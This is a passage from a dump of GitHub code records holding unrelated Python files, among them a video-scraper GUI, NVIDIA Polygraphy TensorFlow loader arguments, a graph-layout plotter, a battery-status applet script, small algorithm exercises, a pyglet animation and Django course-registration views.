url):\n\t\tcap = cv2.VideoCapture(url)\n\t\tresult, frame = cap.read()\n\t\tif result: \n\t\t\ttemp_file = tempfile.TemporaryFile()\n\t\t\tframe = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n\t\t\tpil_im = Image.fromarray(frame)\n\t\t\treturn pil_im\n\t\telse: \n\t\t\tprint(\"Fail\")\n\n\tdef save_image(self): \n\t\tself.filename = fd.asksaveasfile(mode='wb', defaultextension='.jpg') # binary mode so PIL can write the image bytes\n\t\tself.latest_image.save(self.filename)\n\t\n\tdef find_dimensions(self, url):\n\t\tcap = cv2.VideoCapture(url)\n\t\tdimensions = (640, 360) #width, height\n\n\t\t# Let us first figure out the dimensions of the video \n\t\ttry:\n\t\t\tresult, frame = cap.read()\n\t\t\tif result: \n\t\t\t\treturn frame.shape\n\t\t\telse: \n\t\t\t\tprint(\"Error in first grab\")\n\t\t\t\treturn dimensions \n\t\texcept Exception as e: \n\t\t\tprint(e)\n\n\tdef calculate_frame_rate(self, url):\n\t\tcap = cv2.VideoCapture(url)\n\t\tnum_frames = 30\n\n\t\t# Start time \n\t\tstart = time.time()\n\n\t\tfor i in range(0, num_frames):\n\t\t\tret, frame = cap.read()\n\n\t\t\t# End time\n\t\t\tend = time.time()\n\n\t\treturn int((num_frames/(end - start)) * 2)\n\t\n\tdef stop_record(self): \n\t\tself.recording = False\n\n\tdef record(self, args={'framerate': 10}):\n\t\tprint(\"Finding dimensions\")\n\t\turl = self.url_input.get()\n\t\tself.recording = True\n\t\tdimensions = self.find_dimensions(url)\n\n\t\tfourcc = cv2.VideoWriter_fourcc(*'MP4V')\n\t\twriter = cv2.VideoWriter('../output--{0}.mp4'.format(time.strftime('%y-%m-%d-%H-%M')), fourcc, args['framerate'], (dimensions[1], dimensions[0]))\n\n\t\ttry: \n\t\t\tif hasattr(args, 'mjpeg') == False or args['mjpeg'] == True:\n\t\t\t\tcap = cv2.VideoCapture(url)\n\n\t\t\twhile(self.recording):\n\t\t\t\ttry: \n\t\t\t\t\tif 'mjpeg' in args and args['mjpeg'] != True:\n\t\t\t\t\t\tcap = cv2.VideoCapture(url)\n\n\t\t\t\t\t\tresult, frame = cap.read()\n\t\t\t\t\t\tif result == False: \n\t\t\t\t\t\t\tprint(\"Error in cap.read()\") # this is for preventing a breaking error \n\t\t\t\t\t\t\t# break; \n\t\t\t\t\t\t\tpass; \n\t\t\t\t\t\tplt.imshow(frame)\n\t\t\t\t\t\twriter.write(frame)\n\t\t\t\t\t\tplt.show()\n\n\t\t\t\t\tif 'mjpeg' in args and args['mjpeg'] != True:\n\t\t\t\t\t\tcap.release()\n\n\t\t\t\texcept Exception as e: \n\t\t\t\t\tprint(e)\n\t\t\t\t\tclear_output(wait=True)\n\t\texcept KeyboardInterrupt:\n\t\t\tcap.release()\n\t\t\twriter.release()\n\t\t\tcv2.destroyAllWindows()\n\nroot = tk.Tk()\napp = App(master=root)\napp.mainloop()","repo_name":"jonathanstyu/python-videoscraper-desktopapp","sub_path":"scraper.py","file_name":"scraper.py","file_ext":"py","file_size_in_byte":3497,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"70315586727","text":"from polygraphy import mod, util\nfrom polygraphy.logger import G_LOGGER, LogMode\nfrom polygraphy.tools.args import util as args_util\nfrom polygraphy.tools.args.base import BaseArgs\nfrom polygraphy.tools.args.model import ModelArgs\nfrom polygraphy.tools.script import make_invocable\n\n\n@mod.export()\nclass TfTrtArgs(BaseArgs):\n    \"\"\"\n    [UNTESTED] TensorFlow-TensorRT Integration: TensorFlow-TensorRT.\n\n    Depends on:\n\n        - TrtConfigArgs\n        - TrtLegacyRunnerArgs\n    \"\"\"\n\n    def add_parser_args_impl(self):\n        self.group.add_argument(\n            \"--tftrt\",\n            \"--use-tftrt\",\n            help=\"Enable TF-TRT integration\",\n            action=\"store_true\",\n            default=None,\n            dest=\"use_tftrt\",\n        )\n        self.group.add_argument(\n            \"--minimum-segment-size\",\n            help=\"Minimum length of a segment to convert to TensorRT\",\n            
type=int,\n default=None,\n )\n self.group.add_argument(\n \"--dynamic-op\",\n help=\"Enable dynamic mode (defers engine build until runtime)\",\n action=\"store_true\",\n default=None,\n )\n\n def parse_impl(self, args):\n \"\"\"\n Parses command-line arguments and populates the following attributes:\n\n Attributes:\n use_tftrt (bool): Whether to use TF-TRT.\n minimum_segment_size (int): The minimum size of segments offloaded to TRT.\n dynamic_op (bool): Whether to enable dynamic mode, which defers engine building until runtime.\n \"\"\"\n self.use_tftrt = args_util.get(args, \"use_tftrt\")\n self.minimum_segment_size = args_util.get(args, \"minimum_segment_size\")\n self.dynamic_op = args_util.get(args, \"dynamic_op\")\n\n def add_to_script_impl(self, script, loader_name=None, suffix=None):\n \"\"\"\n Args:\n loader_name (str): The name of the loader which should be consumed by the ``UseTfTrt`` loader.\n \"\"\"\n if self.use_tftrt:\n from polygraphy.tools.args.backend.trt import TrtConfigArgs\n from polygraphy.tools.args.backend.trt_legacy import TrtLegacyRunnerArgs\n\n script.add_import(imports=[\"UseTfTrt\"], frm=\"polygraphy.backend.tf\")\n loader_str = make_invocable(\n \"UseTfTrt\",\n loader_name,\n max_workspace_size=self.arg_groups[TrtConfigArgs]._workspace,\n fp16=self.arg_groups[TrtConfigArgs].fp16,\n int8=self.arg_groups[TrtConfigArgs].int8,\n max_batch_size=self.arg_groups[TrtLegacyRunnerArgs].batch_size,\n is_dynamic_op=self.dynamic_op,\n minimum_segment_size=self.minimum_segment_size,\n )\n loader_name = script.add_loader(loader_str, \"use_tftrt\", suffix=suffix)\n return loader_name\n\n\n@mod.export()\nclass TfLoadArgs(BaseArgs):\n \"\"\"\n TensorFlow Model Loading: loading TensorFlow models.\n\n Depends on:\n\n - ModelArgs\n - TfTrtArgs: if allow_tftrt == True\n - TrtSaveEngineBytesArgs: if allow_tftrt == True\n \"\"\"\n\n def __init__(self, allow_artifacts: bool = None, allow_custom_outputs: bool = None, allow_tftrt: bool = None):\n \"\"\"\n Args:\n allow_artifacts (bool):\n Whether to allow saving artifacts to the disk, like frozen models or TensorBoard visualizations.\n Defaults to True.\n allow_custom_outputs (bool):\n Whether to allow marking custom output tensors.\n Defaults to True.\n allow_tftrt (bool):\n Whether to allow applying TF-TRT.\n Defaults to False.\n\n \"\"\"\n super().__init__()\n self._allow_artifacts = util.default(allow_artifacts, True)\n self._allow_custom_outputs = util.default(allow_custom_outputs, True)\n self._allow_tftrt = util.default(allow_tftrt, False)\n\n def add_parser_args_impl(self):\n self.group.add_argument(\n \"--ckpt\",\n help=\"[EXPERIMENTAL] Name of the checkpoint to load. Required if the `checkpoint` file is missing. Should not include file extension \"\n \"(e.g. to load `model.meta` use `--ckpt=model`)\",\n default=None,\n )\n if self._allow_custom_outputs:\n self.group.add_argument(\n \"--tf-outputs\",\n help=\"Name(s) of TensorFlow output(s). 
\"\n \"Using '--tf-outputs mark all' indicates that all tensors should be used as outputs\",\n nargs=\"+\",\n default=None,\n )\n\n if self._allow_artifacts:\n self.group.add_argument(\n \"--save-pb\",\n help=\"Path to save the TensorFlow frozen graphdef\",\n default=None,\n dest=\"save_frozen_graph_path\",\n )\n self.group.add_argument(\n \"--save-tensorboard\",\n help=\"[EXPERIMENTAL] Path to save a TensorBoard visualization\",\n default=None,\n dest=\"save_tensorboard_path\",\n )\n\n self.group.add_argument(\n \"--freeze-graph\", help=\"[EXPERIMENTAL] Attempt to freeze the graph\", action=\"store_true\", default=None\n )\n\n def parse_impl(self, args):\n \"\"\"\n Parses command-line arguments and populates the following attributes:\n\n Attributes:\n ckpt (str): Name of the checkpoint.\n outputs (List[str]): Names of output tensors.\n save_frozen_graph_path (str): The path at which the frozen graph will be saved.\n save_tensorboard_path (str): The path at which the TensorBoard visualization will be saved.\n freeze_graph (bool): Whether to attempt to freeze the graph.\n \"\"\"\n self.ckpt = args_util.get(args, \"ckpt\")\n self.outputs = args_util.get_outputs(args, \"tf_outputs\")\n self.save_frozen_graph_path = args_util.get(args, \"save_frozen_graph_path\")\n self.save_tensorboard_path = args_util.get(args, \"save_tensorboard_path\")\n self.freeze_graph = args_util.get(args, \"freeze_graph\")\n\n def add_to_script_impl(self, script, disable_custom_outputs=None):\n \"\"\"\n Args:\n disable_custom_outputs (bool):\n Whether to disallow modifying outputs according to the `outputs` attribute.\n Defaults to False.\n \"\"\"\n\n model_file = self.arg_groups[ModelArgs].path\n model_type = self.arg_groups[ModelArgs].model_type\n\n if model_type == \"ckpt\":\n G_LOGGER.verbose(\n f\"Loading a TensorFlow checkpoint from {model_file}. Please ensure you are not using the --use-subprocess flag\",\n mode=LogMode.ONCE,\n )\n script.add_import(imports=[\"GraphFromCkpt\"], frm=\"polygraphy.backend.tf\")\n loader_id = \"load_ckpt\"\n loader_str = make_invocable(\"GraphFromCkpt\", model_file, self.ckpt)\n elif model_type == \"keras\":\n script.add_import(imports=[\"GraphFromKeras\"], frm=\"polygraphy.backend.tf\")\n loader_id = \"load_keras\"\n loader_str = make_invocable(\"GraphFromKeras\", model_file)\n elif model_type == \"frozen\":\n script.add_import(imports=[\"GraphFromFrozen\"], frm=\"polygraphy.backend.tf\")\n G_LOGGER.verbose(\n \"Attempting to load as a frozen graph. 
If this is not correct, please specify --model-type\",\n mode=LogMode.ONCE,\n )\n loader_id = \"load_frozen\"\n loader_str = make_invocable(\"GraphFromFrozen\", model_file)\n else:\n G_LOGGER.critical(f\"Model type: {model_type} cannot be imported with TensorFlow.\")\n\n loader_name = script.add_loader(loader_str, loader_id)\n\n if self.freeze_graph:\n script.add_import(imports=[\"OptimizeGraph\"], frm=\"polygraphy.backend.tf\")\n loader_name = script.add_loader(make_invocable(\"OptimizeGraph\", loader_name), \"optimize_graph\")\n\n engine_dir = None\n if self._allow_tftrt:\n from polygraphy.tools.args.backend.trt import TrtSaveEngineBytesArgs\n\n loader_name = self.arg_groups[TfTrtArgs].add_to_script(script, loader_name)\n engine_dir = self.arg_groups[TrtSaveEngineBytesArgs].path\n\n MODIFY_TF = \"ModifyGraphOutputs\"\n outputs = None if disable_custom_outputs else args_util.get_outputs_for_script(script, self.outputs)\n modify_tf_str = make_invocable(MODIFY_TF, loader_name, outputs=outputs)\n if modify_tf_str != make_invocable(MODIFY_TF, loader_name):\n script.add_import(imports=[MODIFY_TF], frm=\"polygraphy.backend.tf\")\n loader_name = script.add_loader(modify_tf_str, \"modify_tf\")\n\n WRITE_TF = \"SaveGraph\"\n write_tf_str = make_invocable(\n WRITE_TF,\n loader_name,\n path=self.save_frozen_graph_path,\n tensorboard_dir=self.save_tensorboard_path,\n engine_dir=engine_dir,\n )\n if write_tf_str != make_invocable(WRITE_TF, loader_name):\n script.add_import(imports=[WRITE_TF], frm=\"polygraphy.backend.tf\")\n loader_name = script.add_loader(write_tf_str, \"save_tf\")\n\n return loader_name\n\n def load_graph(self):\n \"\"\"\n Loads a TensorFlow graph according to arguments provided on the command-line.\n\n Returns:\n tf.Graph\n \"\"\"\n loader = args_util.run_script(self.add_to_script)\n return loader()\n","repo_name":"NVIDIA/TensorRT","sub_path":"tools/Polygraphy/polygraphy/tools/args/backend/tf/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":9576,"program_lang":"python","lang":"en","doc_type":"code","stars":8187,"dataset":"github-code","pt":"53"} +{"seq_id":"5652522492","text":"\"\"\"Utilities for manipulating binary strings/masks.\"\"\"\n__author__ = \"David Warde-Farley\"\n__copyright__ = \"Copyright 2012, Universite de Montreal\"\n__credits__ = [\"David Warde-Farley\"]\n__license__ = \"3-clause BSD\"\n__email__ = \"wardefar@iro\"\n__maintainer__ = \"David Warde-Farley\"\n\nimport numpy as np\nfrom theano.compat.six.moves import xrange\n\n\ndef all_bit_strings(bits, dtype='uint8'):\n \"\"\"\n Create a matrix of all binary strings of a given width as the rows.\n\n Parameters\n ----------\n bits : int\n The number of bits to count through.\n\n dtype : str or dtype object\n The dtype of the returned array.\n\n Returns\n -------\n bit_strings : ndarray, shape (2 ** bits, bits)\n The numbers from 0 to 2 ** bits - 1 as binary numbers, most\n significant bit first.\n\n Notes\n -----\n Obviously the memory requirements of this are exponential in the first\n argument, so use with caution.\n \"\"\"\n return np.array([[int(x) for x in np.binary_repr(i, width=bits)]\n for i in xrange(0, 2 ** bits)], dtype=dtype)\n","repo_name":"lisa-lab/pylearn2","sub_path":"pylearn2/utils/bit_strings.py","file_name":"bit_strings.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":2743,"dataset":"github-code","pt":"53"} +{"seq_id":"16154538144","text":"#coding=utf-8\nimport networkx as nx\nfrom matplotlib import pyplot\nimport numpy 
as np\nimport argparse\nimport warnings\nimport random\n\n\ndef fxn():\n warnings.warn(\"deprecated\", DeprecationWarning)\n\ndef normalize(Y):\n Y_cpy = Y.copy()\n # Translate s.t. smallest values for both x and y are 0.\n for dim in range(Y.shape[1]):\n Y_cpy[:, dim] += -Y_cpy[:, dim].min()\n # Scale s.t. max(max(x, y)) = 1 (while keeping the same aspect ratio!)\n scaling = 1 / (np.absolute(Y_cpy).max())\n Y_cpy *= scaling\n return Y_cpy\n\ndef load_graphpos(filename):\n nnode = 0\n dim = 0\n with open(filename) as f:\n header = f.readline()\n nnode,dim = [int(i) for i in header.split()]\n rawdata = np.loadtxt(filename,dtype=float,skiprows=1)\n data = [(n[0],n[1]) for n in rawdata]\n return nnode, dim, np.array(data)\n\ndef txtToPng(layout, outpng, graph):\n G=nx.Graph()\n nnode, dim, Y = load_graphpos(layout)\n data = normalize(Y)\n\n index = 0\n while index < nnode:\n i = data[index][0]\n j = data[index][1]\n G.add_node(index, pos=(i,j))\n index += 1\n\n f = open(graph)\n line = f.readline()\n l1 = line.split(' ')\n nnode = int(l1[0])\n nedge = int(l1[1])\n index = 0\n while line:\n line = f.readline()\n ll = line.split(' ')\n if len(ll) < 3:\n continue\n i = int(ll[0])\n j = int(ll[1])\n if i == j:\n continue\n if nedge < 600000:\n G.add_edges_from([(i,j)])\n elif nedge < 3000000:\n if random.randint(0, 9) == 0:\n G.add_edges_from([(i,j)])\n else:\n if random.randint(0, 99) == 0:\n G.add_edges_from([(i,j)])\n\n index += 1\n f.close()\n pos=nx.get_node_attributes(G,'pos')\n edges = G.edges()\n edge_length = []\n edge_length = [np.sqrt((pos[x][0]-pos[y][0])**2 + (pos[x][1]-pos[y][1])**2) for (x,y) in edges]\n edge_length = np.array(edge_length)\n edge_length = edge_length - np.min(edge_length)\n edge_length = edge_length / np.max(edge_length)\n\n pyplot.axis('off')\n set_width = 0.2\n if nedge < 5000:\n set_width = 0.4\n elif nedge > 400000:\n set_width = 0.02\n\n nx.draw_networkx(G,pos, node_color='white',node_size=0, alpha=1, width = set_width, with_labels=False, edge_color = edge_length, edge_cmap = pyplot.get_cmap('jet_r'))\n pyplot.savefig(outpng, dpi = 300, pad_inches = 0)\n pyplot.close('all')\n print(\"visualize complete!\")\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n\n parser.add_argument('-graph', default = '', help = 'Input graphs')\n parser.add_argument('-layout', default = '', help = 'Graph layout result')\n parser.add_argument('-outpng', default = '', help = 'Visualization result')\n\n args = parser.parse_args()\n\n with warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n txtToPng(args.layout, args.outpng, args.graph)\n fxn()\n\n","repo_name":"ZJUVAI/DRGraph","sub_path":"visualization/layout.py","file_name":"layout.py","file_ext":"py","file_size_in_byte":2985,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"53"} +{"seq_id":"16123694604","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n# Source:\n# https://askubuntu.com/questions/878556/get-battery-status-to-update-more-often-or-on-ac-power-wake\n\nimport dbus\nimport os\nimport sys\nimport time\n\ndef run_dbus_method(bus_type, obj, path, interface, method, arg):\n if bus_type == \"session\":\n bus = dbus.SessionBus()\n elif bus_type == \"system\":\n bus = dbus.SystemBus()\n else:\n return None\n\n proxy = bus.get_object(obj, path)\n dbus_method = proxy.get_dbus_method(method, interface)\n\n return dbus_method(arg) if arg else dbus_method()\n\ndef find_battery_path():\n call = [ 'system', 'org.freedesktop.UPower', \n 
'/org/freedesktop/UPower', 'org.freedesktop.UPower',\n 'EnumerateDevices', None ]\n devices = run_dbus_method(*call)\n for i in devices:\n if 'BAT' in i: return str(i)\n\ndef main():\n bat_path = find_battery_path()\n call = [ 'system', 'org.freedesktop.UPower',\n bat_path, 'org.freedesktop.UPower.Device',\n 'Refresh', None ]\n\n run_dbus_method(*call)\n # Call upower, parse the output and write the energy rate without context to a file\n # The energy rate uses a \",\" as decimal separator for certain locales which needs to be replaced for parsing.\n os.system(\"upower -i $(upower -e | grep BAT) | grep energy-rate | grep -Eo '[0-9]+([,|.][0-9]+)?' | sed 's/,/./' > .energyrate\")\n os.system(\"upower -i $(upower -e | grep BAT) | grep state | rev | cut -d ' ' -f 1 | rev > .batterystate\")\n\nif __name__ == '__main__': main()","repo_name":"linuxmint/cinnamon-spices-applets","sub_path":"batterypower@joka42/files/batterypower@joka42/update_upower.py","file_name":"update_upower.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":535,"dataset":"github-code","pt":"53"} +{"seq_id":"31384753177","text":"with open('herding.in','r') as fin:\n lines=fin.readlines()\n\ncows=list(map(int,lines[0].split()))\ndistances=[cows[1]-cows[0],cows[2]-cows[1]]\n\nif distances[0]==1 and distances[1]==1:\n min_moves=0\n max_moves=0\nelse:\n if distances[0]==2 or distances[1]==2:\n min_moves=1\n else:\n min_moves=2\n if distances[0]>distances[1]:\n max_moves=distances[0]-1\n else:\n max_moves=distances[1]-1\n\nwith open('herding.out','w') as fout:\n fout.write(str(min_moves)+'\\n')\n fout.write(str(max_moves)+'\\n')\n","repo_name":"RithvikKo/usaco","sub_path":"2018-19/bronze/feb/herding.py","file_name":"herding.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72767329769","text":"\"\"\"this program is a graphical representation of two randomly moving triangles\"\"\"\n\nimport pyglet\nimport pyglet.gl\nimport colors\nimport random\nfrom triangleClass import triangleClass\n\n# initialise a list of triangles\ntriangles = []\n\n# populate the list of triangles\ntriangles.append(triangleClass('triangle1', 'hotpink', 0, 0, 20))\ntriangles.append(triangleClass('triangle2', 'green', 0, 0, 20))\ntriangles.append(triangleClass('triangle3', 'cyan', 0, 0, 20))\ntriangles.append(triangleClass('triangle4', 'red', 0, 0, 20))\ntriangles.append(triangleClass('triangle5', 'yellow', 0, 0, 20))\n\nclass graphicsWindow(pyglet.window.Window):\n def __init__(self):\n vmax = 10 # Maximum velocity for rng\n thetaParameter = 10 # Maximum theta\n super(graphicsWindow, self).__init__() # constructor for graphicsWindow class\n\n for i in range(0, len(triangles)):\n # set inital coordinates of the centre of the triangles\n triangles[i].setCentreCoordinates(self.width / 2, self.height / 2)\n triangles[i].updateVertices()\n # set initial velocities of each triangle\n triangles[i].setVelocity(random.randint(-vmax, vmax), random.randint(-vmax, vmax))\n triangles[i].setThetaIncrement(random.gauss(0, thetaParameter))\n triangles[i].setSpringConstants(random.uniform(0.0001, 0.01), random.uniform(0.0001, 0.01))\n\n def update(self, dt):\n #print (\"Updating the center of the triangles\")\n for i in range(0, len(triangles)):\n triangles[i].updateCentreCoordinates(self.width, self.height)\n triangles[i].updateVertices()\n triangles[i].updateTheta()\n triangles[i].rotateVertices()\n 
triangles[i].updateAccn(self.width / 2, self.height / 2)\n triangles[i].updateVelocity()\n\n def on_draw(self):\n # clear the graphics buffer\n pyglet.gl.glClear(pyglet.gl.GL_COLOR_BUFFER_BIT)\n\n for i in range(0, len(triangles)):\n # calculate list of vertices to draw triangle\n vertexList = triangles[i].getVertices()\n # use pyGlet to draw lines between the vertices\n lineColor = triangles[i].getColor()\n pyglet.gl.glColor3f(colors.color[lineColor][0],colors.color[lineColor][1],colors.color[lineColor][2]) # specify colors\n vertexList.draw(pyglet.gl.GL_LINE_LOOP) # draw\n\n# this is the main game engine loop\nif __name__ == '__main__':\n window = graphicsWindow() # initialize a window class\n pyglet.clock.schedule_interval(window.update, 1 / 60.0) # tell pyglet the on_draw() & update() timestep\n pyglet.app.run() # run pyglet","repo_name":"davidglo/TMCS-2018-freshStart","sub_path":"game_projects/zack-game/source/triangles.py","file_name":"triangles.py","file_ext":"py","file_size_in_byte":2663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43073975977","text":"from tkinter import Toplevel\nfrom tkinter import Label\nfrom tkinter import Entry\nfrom tkinter import Button\nfrom tkinter import filedialog\nimport tkinter as tk\n\n\nclass NewProjectWindow:\n\n def __init__(self, parent, model):\n self.model = model\n self.parent = parent\n self.window = Toplevel(parent.window)\n self.window.title('Nowy projekt')\n self.window.geometry('600x90')\n self.window.rowconfigure(0, weight=1)\n self.window.rowconfigure(1, weight=1)\n self.window.columnconfigure(1, weight=1)\n Label(self.window, text='Nazwa projektu:').grid(row=0, sticky=tk.NW+tk.N+tk.S)\n self.name_entry = Entry(self.window)\n self.name_entry.grid(row=0, column=1, columnspan=2, sticky=tk.NW+tk.N+tk.S+tk.E)\n Label(self.window, text='Ścieżka do projektu:').grid(row=1, column=0, sticky=tk.NW+tk.N+tk.S)\n self.path_label = Label(self.window, anchor=tk.W, bg='white', width=40)\n self.path_label.grid(row=1, column=1, sticky=tk.NW+tk.N+tk.S+tk.E)\n Button(self.window, text='Wybierz', command=self.pick_dir).grid(row=1, column=2, sticky=tk.NW+tk.N+tk.S)\n Button(self.window, text='Anuluj', command=self.destroy).grid(row=2, column=0, sticky=tk.NW + tk.N + tk.S+tk.E)\n Button(self.window, text='Stwórz', command=self.create).grid(row=2, column=2, sticky=tk.NW + tk.N + tk.S+tk.E)\n\n def pick_dir(self):\n options = {}\n options['defaultextension'] = '.afz'\n options['filetypes'] = [('Pliki projektu', '.afz'), ('Wszystkie pliki', '.*')]\n options['title'] = 'Utwórz projekt'\n filename = filedialog.asksaveasfilename(**options)\n self.path_label.config(text=filename)\n\n def create(self):\n self.model.new_project(self.path_label['text'], self.name_entry.get())\n self.destroy()\n\n def destroy(self):\n self.window.destroy()\n","repo_name":"Thun0/dev-fuzz","sub_path":"view/newprojectwindow.py","file_name":"newprojectwindow.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40255402154","text":"\r\nimport numpy as np\r\n\r\n\r\ndef CalculatedTerms(numerator_p,denominator_p,numberOfTerms):\r\n lengthToAppend = abs(len(numerator_p) - len(denominator_p))\r\n zeros = np.zeros(lengthToAppend) \r\n numerator = np.append(numerator_p,zeros)\r\n denominator = np.array(denominator_p)\r\n print(numerator)\r\n print(denominator)\r\n print('---------------')\r\n\r\n result = []\r\n nextnumberAddition 
= 0\r\n    arrayOfArrays = []\r\n    arrayOfArrays.append(numerator)\r\n    a = numerator[0]/denominator[0]\r\n    result.append(a)\r\n    A_r = -(a)\r\n    #print('')\r\n    #print(A_r)\r\n    #print('')\r\n\r\n    for i in range(1,numberOfTerms):\r\n        #print(arrayOfArrays[i-1])\r\n        p = np.multiply(denominator,A_r)\r\n        #print(p)\r\n        z = np.add(arrayOfArrays[i-1],p)\r\n        z_n = np.delete(z,0)\r\n        z_new = np.append(z_n,0)\r\n        arrayOfArrays.append(z_new)\r\n        a = (arrayOfArrays[i][0])/denominator[0]\r\n        result.append(a)\r\n        A_r = -a\r\n\r\n    #CompletedResult = np.append(zeros,result)\r\n    print(result)\r\n\r\nx = [0, 0, 0.577,-1.809,2.10,-1.070,0.202, 0]\r\ny = [1,-0.021,-3.629,2.453,1.880,-2.353,0.751,-0.078]\r\n\r\n\r\n\r\nCalculatedTerms(x,y,7)\r\n\r\n\r\n","repo_name":"NA-56/InverseZTransform_Python","sub_path":"DirectDivisionMethod/DirectPolyDivision.py","file_name":"DirectPolyDivision.py","file_ext":"py","file_size_in_byte":1176,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"12969642637","text":"# Python Class 1889\n# Lesson 2 Problem 4 Part (a)\n# Author: madmathninja (272729)\n\ndef permute(inputList):\n    '''permute(inputList) -> list\n    returns list of all permutations of inputList'''\n    if len(inputList) == 0:\n        return []\n    if len(inputList) == 1:\n        return [inputList]\n\n    perms = []\n\n    for i in range(len(inputList)):\n        ele = inputList[i]\n\n        remPerms = inputList[:i] + inputList[i+1:]\n\n        for p in permute(remPerms):\n            perms.append([ele] + p)\n    return perms\n\n# test cases\nprint(permute([1,2]))\n# should print [[1,2], [2,1]] in some order\nprint(permute([1,2,3]))\n# should print [[1,2,3], [1,3,2], [2,1,3], [3,1,2], [2,3,1], [3,2,1]] in some order","repo_name":"matthewru/PythonLearning","sub_path":"AOPS_Intermediate_Python/Week2/ChallengeProblem4a.py","file_name":"ChallengeProblem4a.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
+{"seq_id":"42471537072","text":"from django.contrib import admin\nfrom django.urls import path,include\nfrom .views import *\nurlpatterns = [\n    path('', inicio, name=\"inicio\"),\n    path(\"base/\",base),\n    path('productos/', productos,name=\"productos\"),\n    path('empleados/',empleados,name=\"empleados\"),\n    path('clientes/',clientes,name=\"clientes\"),\n    path('about/',about,name=\"about\"),\n    path('crearproducto/',crear_producto,name=\"crear_producto\"),\n    path('crearempleado/',crear_empleado,name=\"crear_empleado\"),\n    path('crearcliente/',crear_cliente,name=\"crear_cliente\"),\n    path('buscarproducto/',buscar_producto,name='busqueda_producto'),\n    path('verproducto/<int:pk>/',ver_producto, name='verproducto'),\n    path(\"editarproducto/<int:pk>/\",editar_producto,name=\"editarproducto\"),\n    path(\"eliminarproducto/<int:pk>/\",eliminar_producto,name=\"eliminarproducto\"),\n    path(\"editarempleado/<int:pk>/\",editar_empleado,name=\"editarempleado\"),\n    path(\"eliminarempleado/<int:pk>/\",eliminar_empleado,name=\"eliminarempleado\"),\n    path(\"editarcliente/<int:pk>/\",editar_cliente,name=\"editarcliente\"),\n    path(\"eliminarcliente/<int:pk>/\",eliminar_cliente,name=\"eliminarcliente\"),\n    path('login', login_request, name=\"login\"),\n    path('register', register_request, name=\"register\"),\n    path('logout', logout_request, name=\"logout\"),\n]","repo_name":"Fbarbero10/ecommerce-master","sub_path":"ecommerce-master/ComercioApp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1347,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
+{"seq_id":"74739416489","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\n\nfrom accounts.models import Student\nfrom coursereg.models import CourseReg\nfrom coursereg.serializers import CourseRegSerializer\nfrom courseresult.models import CourseResult\nfrom coursetomajor.models import CourseToMajor\nfrom coursetomajor.serializers import CourseToMajorSerializer\nfrom coursewaving.models import WavedCourses\n\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef registrable_courses(request):\n req = request.GET\n courses = []\n outstandings = []\n\n student = Student.objects.get(pk=req['student'])\n\n course_to_major = CourseToMajor.objects.filter(major=student.major,\n level__level__lte=student.level.level)\n registered_courses = CourseReg.objects.filter(student=student.id,\n session=req['session'])\n result = CourseResult.objects.filter(student=student.id)\n wavings = WavedCourses.objects.filter(student=student.id)\n\n session_courses = course_to_major.filter(level=student.level.id)\n\n for c in session_courses:\n try:\n wavings.get(course=c.course.id)\n not_in_wavings = False\n except WavedCourses.DoesNotExist:\n not_in_wavings = True\n\n try:\n registered_courses.get(course=c.course.id)\n not_in_reg = False\n except CourseReg.DoesNotExist:\n not_in_reg = True\n\n if not_in_wavings and not_in_reg:\n courses.append(c)\n\n for c in course_to_major:\n try:\n wavings.get(course=c.course.id)\n not_in_wavings = False\n except WavedCourses.DoesNotExist:\n not_in_wavings = True\n\n try:\n registered_courses.get(course=c.course.id)\n not_in_reg = False\n except CourseReg.DoesNotExist:\n not_in_reg = True\n\n try:\n result.exclude(status=0).get(course=c.course.id)\n not_in_result = False\n except CourseResult.DoesNotExist:\n not_in_result = True\n\n if c in courses:\n not_in_semester_courses = False\n else:\n not_in_semester_courses = True\n\n if not_in_wavings and not_in_reg and not_in_result and not_in_semester_courses:\n outstandings.append(c)\n\n return Response({\"courses\": CourseToMajorSerializer(courses, many=True).data,\n \"reg_courses\": CourseRegSerializer(registered_courses, many=True).data,\n \"outstandings\": CourseToMajorSerializer(outstandings, many=True).data})\n","repo_name":"GHostEater/Portal","sub_path":"coursereg/views/registrable_courses.py","file_name":"registrable_courses.py","file_ext":"py","file_size_in_byte":2783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11342582752","text":"import datetime\nfrom django.contrib import messages\nfrom django.contrib.auth import logout\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth.models import Group, User\nfrom django.core.mail import EmailMultiAlternatives\nfrom django.db.models import Count\nfrom django.http import JsonResponse\nfrom django.shortcuts import render, redirect\nfrom rest_framework.decorators import api_view\nfrom listArch.models.Option import Option\nfrom listArch.models.OptionValue import OptionValue\n\nfrom listArch.models.ProductOptionValue import ProductOptionValue\nfrom listArch.models.Category import Category\nfrom listArch.models.Product import Product\nfrom listArch.models.CompanyCode import CompanyCode\nfrom listArch.models.SocialMedia import SocialMedia\nfrom 